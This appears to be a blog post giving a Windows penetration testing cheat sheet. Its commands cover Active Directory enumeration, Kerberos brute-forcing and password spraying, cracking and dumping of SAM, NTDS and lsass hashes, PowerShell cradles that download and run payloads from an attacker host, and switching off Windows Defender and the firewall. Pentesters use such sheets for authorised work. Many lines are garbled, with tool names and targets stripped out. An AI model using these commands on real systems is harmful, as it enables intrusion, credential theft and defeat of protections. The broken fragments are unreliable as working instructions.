Information Technology | Softwares - Graphics - Programming - Hacking - Security

Apr 15, 2020

Windows Penetration Testing Cheat Sheet

Ldap enumeration
$ enum4linux -a
$ smbclient -L \\ -N
$ ldapsearch -x -H ldap:// -b "dc=DOMAIN,dc=LOCAL"
$ python -u username -p password -d DOMAIN.LOCAL --dc-ip
$ python -d DOMAIN.LOCAL -l -u username -p password

Find some useful credentials:
$ -dc-ip -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\

$ evil-winrm -i -u username -p password
$ username:password@
$ -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@

$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc users.txt
Password brute
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc rockyou.txt username123

Password spray
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc users.txt rockyou.txt
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

Crack Tickets:
$ python /usr/share/wordlists/rockyou.txt ticket.kirbi

$ crackmapexec smb -u '' -p ''
$ crackmapexec <protocol>

Changing Permissions of a File: 
> icacls file.txt /grant Everyone:F

Downloading files
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")  
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"  
> certutil.exe -urlcache -split -f "" shell.exe

Privilege Escalation:
Autlogon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
$ -dc-ip defaultUserName:defaultPassword\!@
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

NTDS.dit dump:
$ -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ -u username -p password -d DOMAIN.LOCAL --ntds drsuapi

on DC, lsass.exe can dump hashes
> lsadump::lsa /inject

> systeminfo
> hostname 

Especially good with hotfix info
> wmic qfe get Caption,Description,HotFixID,InstalledOn

What users/localgroups are on the machine?
> net users
> net localgroups
> net localgroup Administrators
> net user username

Crosscheck local and domain too
> net user username /domain
> net group Administrators /domain

Network information
> ipconfig /all
> route print
> arp -A

To see what tokens we have 
> whoami /priv

What we can access?
> whoami /groups

Recursive string scan
> findstr /spin "password" *.*

Running processes
> tasklist /SVC

Network connections
> netstat -ano

Search for writeable directories
> dir /a-r-d /s /b

Show files/dir and hidden
> dir -force

Windows Defender
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true

> Netsh Advfirewall show allprofiles
> NetSh Advfirewall set allprofiles state off

Useful tools/modules
Nishang :


About Us